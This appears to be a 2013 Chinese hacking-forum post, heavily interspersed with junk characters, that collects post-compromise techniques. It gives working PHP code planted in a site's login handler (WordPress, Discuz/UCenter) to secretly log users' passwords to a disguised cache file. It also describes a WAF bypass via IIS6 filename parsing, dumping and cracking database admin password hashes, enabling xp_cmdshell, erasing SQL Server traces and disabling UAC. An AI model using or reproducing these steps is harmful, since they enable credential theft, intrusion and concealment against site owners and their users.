/ Z7 O; x8 j' R9 i' @. F. v}" C3 n8 [$ ^9 s- U
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。/ K- @) {" P: i
就是搜索case ‘login’2 F& s' t# r' p
在它下面直接插入即可,记录的密码生成在pwd.txt中,
t' [* Z, O: b. u其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录% c9 M8 H% G% j5 P. U, B: D
利用II6文件解析漏洞绕过安全狗代码:8 l3 \* {' C5 p8 i2 m" i! Y, d8 X
;antian365.asp;antian365.jpg
4 G3 G r) z, _* V; U
0 j& y- L: Y! y4 Q4 z- L% \各种类型数据库抓HASH破解最高权限密码!
" u! [9 g7 S& Y4 f. a' g: b( H1.sql server2000
( c' p$ ^1 r0 B- _# qSELECT password from master.dbo.sysxlogins where name='sa'- V. X+ P* u( f) T
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
. u7 ^% K' o0 b& y2 V2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
# }% w; M0 ^+ {) W1 D& X% f# r( h6 U8 N* S7 w& n5 Y
0×0100- constant header
, `& l: ~: n) A$ P0 ~5 m' D34767D5C- salt
/ B$ J/ _0 h4 z0 y/ F6 u0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash6 a; p+ Y) k2 k/ H
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
* L8 `" l. z7 b/ S8 n" Zcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash7 `. N2 o5 _* }0 u. W/ V
SQL server 2005:-; V; C& S8 C2 R, O8 Y4 l `2 @$ ^
SELECT password_hash FROM sys.sql_logins where name='sa'
- }3 }3 O5 U+ r0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
* i+ t' N+ @1 n6 B5 F* J0×0100- constant header
$ X0 {1 H$ D2 @$ t993BF231-salt- Q6 w# @* r; d0 ^2 P
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash) j" i! I. b/ e. @% {0 D0 j
crack case sensitive hash in cain, try brute force and dictionary based attacks.8 A& B I8 Y# J" F
# s( w) }3 A2 a1 J8 F
update:- following bernardo’s comments:-
9 H0 x. W6 ^* X+ |" _3 Luse function fn_varbintohexstr() to cast password in a hex string.
! N, w7 n! ?4 t/ H2 Pe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
, i2 ?/ {/ U5 B8 l, K. ^9 d5 A' d; y$ L5 D, u
MYSQL:-4 |$ r; R3 y; i9 z: D' o0 M) `' h
3 |4 _7 g3 F) t& j% e3 B
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
: {, o; q; u9 x9 ]: Q
* l1 X% M6 w9 C9 E _*mysql < 4.18 t" G& g B" I4 f8 g
6 J2 i" r: o" x& R2 e2 G( i; W# L
mysql> SELECT PASSWORD(‘mypass’);9 W- n) F; ]; K7 m s
+——————–+' ~* S% @: }: y" q4 Q) V8 }
| PASSWORD(‘mypass’) | S6 q% t+ j- ^$ C
+——————–+
' c/ S( w; y6 Q/ _2 r& y| 6f8c114b58f2ce9e |' X/ A- m7 z3 \
+——————–+
" S8 l9 z5 R) M4 Z3 @, \$ e
" k2 t- O) n2 Q# I8 l*mysql >=4.1
?" I+ e6 a. q. V
* ] [# x$ a( pmysql> SELECT PASSWORD(‘mypass’);) y& E( U/ U0 q
+——————————————-+
4 n4 U {1 x5 x8 D% W9 y) X: w1 p| PASSWORD(‘mypass’) |) \% L( N2 n# C% F# W, R
+——————————————-+( a9 J/ ?& | ]
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
2 B8 r' `* u1 w4 z3 L% J+——————————————-+
$ ~2 e' ]: @% N$ l1 r9 s" c6 h
2 i" e. M, C3 H B$ TSelect user, password from mysql.user
( l F5 I0 T: s I3 [( fThe hashes can be cracked in ‘cain and abel’0 a( n9 S8 m j" C0 u5 B' D! E5 u |
$ k0 I3 Y6 M3 W# d( T$ o. I
Postgres:-* d Q/ f, X2 v
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)6 h7 s8 I e2 ]7 r5 N7 M, x# _
select usename, passwd from pg_shadow;- y9 M0 |, O) x8 {% c: Q
usename | passwd4 m5 T _, c2 V9 o" [
——————+————————————-9 e; |0 \- C6 |0 }% G
testuser | md5fabb6d7172aadfda4753bf0507ed43967 f3 C3 y& a) Z
use mdcrack to crack these hashes:-
- i u( A5 C( n8 r' S$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396# Q1 m( i* E0 K0 F4 r8 q6 g
$ d2 ~8 b! y5 BOracle:-
7 R2 p4 h X; D5 S R8 ~8 x% xselect name, password, spare4 from sys.user$* e) d: n" G5 U1 j
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g" w7 v! W9 E; x' q6 b0 F! ~% B
More on Oracle later, i am a bit bored….
! a/ T2 d a! ]3 [) v7 X, T
1 N: U3 V/ a3 n1 _: j( t+ \9 W! w, a1 q _8 L6 y @ W- H# T! @
在sql server2005/2008中开启xp_cmdshell
. F5 A( O# m7 d$ R-- To allow advanced options to be changed.
4 d- Y5 x/ @3 e/ `( W; E; o7 zEXEC sp_configure 'show advanced options', 1
0 f% I3 [4 l, r8 i1 I8 mGO
5 C2 h* h3 }3 L0 Y( \& _& y8 J4 F-- To update the currently configured value for advanced options.
5 P4 d. T* O: G# Y- E8 U6 d; X3 ~8 bRECONFIGURE1 y9 \, P% B. C/ {0 k+ [; A. {+ I8 J
GO5 H5 Q3 {! n; }. W: w
-- To enable the feature.
' s' r0 D; `' _' H6 oEXEC sp_configure 'xp_cmdshell', 1
: N: Z; H( J4 J2 M4 `( TGO' l- }8 c# Y- ]7 w7 i5 ^
-- To update the currently configured value for this feature.8 C0 G9 Z% ^, t8 L! D2 ]
RECONFIGURE
6 A a0 @& g4 Z& V0 o# \. s# r. b# RGO' k: i! p$ X8 \; L! X: e% M
SQL 2008 server日志清除,在清楚前一定要备份。1 z0 ?. z, e5 H' E1 d! Q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
) T" ~" T" u$ G% H; |7 ^- B" v1 GX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
- P+ ?8 W; S0 t) R
8 P) n4 A y+ w+ E对于SQL Server 2008以前的版本:
1 `2 h/ r6 @) ]SQL Server 2005:
/ Y0 ^- c& m; E1 h删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat8 C0 s) q( E6 q+ ^% X! [
SQL Server 2000:. t& K6 x* R. b5 e6 r# n
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。9 b l6 b; n* q& |* G
. ]" G& p' c6 S4 H$ l
本帖最后由 simeon 于 2013-1-3 09:51 编辑
8 r* a! }9 r7 J: o4 D) X: {
1 ]; s- C- W" ~ {
1 K( V! {( ?) l+ l4 x2 W) Wwindows 2008 文件权限修改$ I' s& x" {* P s8 c
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
/ p& {& r, Z: o8 W& K! N B2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad988 x/ t: _# j1 ^
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
- l. E$ V' R! W' J; U& G: R' c$ V5 m# p! z' D% t9 o* |- a3 C9 E+ S8 ?) H/ n
Windows Registry Editor Version 5.00
! t. k) p7 B' s0 X& V) x. C8 E% k[HKEY_CLASSES_ROOT\*\shell\runas]
+ K- P# H3 O( E@="管理员取得所有权"5 }% b* n2 k! Y3 c8 j( R
"NoWorkingDirectory"=""! G$ c6 m; j3 F7 O0 f ^
[HKEY_CLASSES_ROOT\*\shell\runas\command]* G- `6 W6 j I% E! L
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 k. V2 C1 @9 Y) Z& X
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"$ R) f. c- z$ X! J8 P% c
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
& E# {* ^4 c4 K6 i@="管理员取得所有权"' K6 }9 _% }2 k5 L
"NoWorkingDirectory"=""0 z& d- p+ w, W6 P
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command], h! a* S1 }4 F: k# t
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ Y( _+ v( _4 W. i, Z% G& p"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" M% B6 x9 W- a( y( H8 @, @% e
' O x( A6 @6 A* ^- ]6 {9 W
[HKEY_CLASSES_ROOT\Directory\shell\runas]9 j: I, L- z, T1 K( Z3 d! {
@="管理员取得所有权"+ R% L9 f" k# y$ {
"NoWorkingDirectory"=""
7 N5 m1 Z- u5 U[HKEY_CLASSES_ROOT\Directory\shell\runas\command]. V1 X. t# w8 l
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"- Z8 U0 v& o5 I) q! B) L d
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" G( R) a! T5 z
* z: M x7 }3 s2 t) W1 Q( F
; u' u& z4 m J' rwin7右键“管理员取得所有权”.reg导入3 V" V+ Q3 R9 t# `
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,) {9 Q! X, i' p1 l9 G
1、C:\Windows这个路径的“notepad.exe”不需要替换
+ i# I3 w8 t K v1 @2、C:\Windows\System32这个路径的“notepad.exe”不需要替换. S; n, j7 P R% t' w
3、四个“notepad.exe.mui”不要管
8 A H v5 A7 ?4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和$ p {5 w* |2 c1 k- s1 t# |+ y
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”6 p/ \" u+ M) z# \- o
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
2 u5 N" Q( f, H! h& I: A& l) t |替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
& \0 u* @7 A8 vwindows 2008中关闭安全策略: ' l) H* {6 g) x
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
1 ] j1 l; ~% g" b( h0 S) X修改uc_client目录下的client.php 在) `! X1 _! ^9 ~5 h1 ]/ F
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
' c+ T* a; A% K6 H1 e' c下加入如上代码,在网站./data/cache/目录下自动生成csslog.php# a0 G: Z9 L9 u/ z. J5 q$ Y- v
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
" B( c" O* z G) z/ e% xif(getenv('HTTP_CLIENT_IP')) {
, C1 ?1 z1 c( d% k$onlineip = getenv('HTTP_CLIENT_IP');
& x- ]8 x! F/ A L5 u- k0 D} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
3 \# a3 j4 ^4 }. \% @0 ^5 N$onlineip = getenv('HTTP_X_FORWARDED_FOR');1 {- j- V4 }' h
} elseif(getenv('REMOTE_ADDR')) {
% U, Y7 Z j) [ ?$onlineip = getenv('REMOTE_ADDR');4 R$ K h% E& H; j% ^
} else {' M' Y. e; d: s! Q; m
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
( k1 w: `8 C- s3 n/ p+ O: [}
% s- f8 A4 f( l9 _0 S1 o $showtime=date("Y-m-d H:i:s");
c/ l$ |% J! ^9 y $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";& M) O- ~$ R7 s" @3 o" t% [' O" m
$handle=fopen('./data/cache/csslog.php','a+');! L4 u8 M# j- ]/ i7 M2 I6 X
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对